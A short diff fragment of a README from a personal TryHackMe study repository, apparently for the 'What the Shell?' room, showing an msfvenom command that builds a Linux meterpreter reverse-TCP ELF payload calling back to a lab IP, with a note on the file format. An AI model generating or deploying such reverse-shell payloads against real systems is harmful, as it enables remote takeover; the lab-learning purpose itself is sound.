reveng007/TryHackMe/_SUBSCRIPTION_/paths/Complete Beginner/07.Shells and Privilege Escalation/01.What the Shell?/README.md

 msfvenom -p linux/x64/meterpreter_reverse_tcp -f elf -o nonstagedshell LHOST=10.8.112.253 LPORT=4444
 ```
 #### NOTE:
-> I have took ELF executable
+> I have took ELF executable, as we can't make exe file with these elf based payload

 All these binaries are present in the `Linux_.... folder`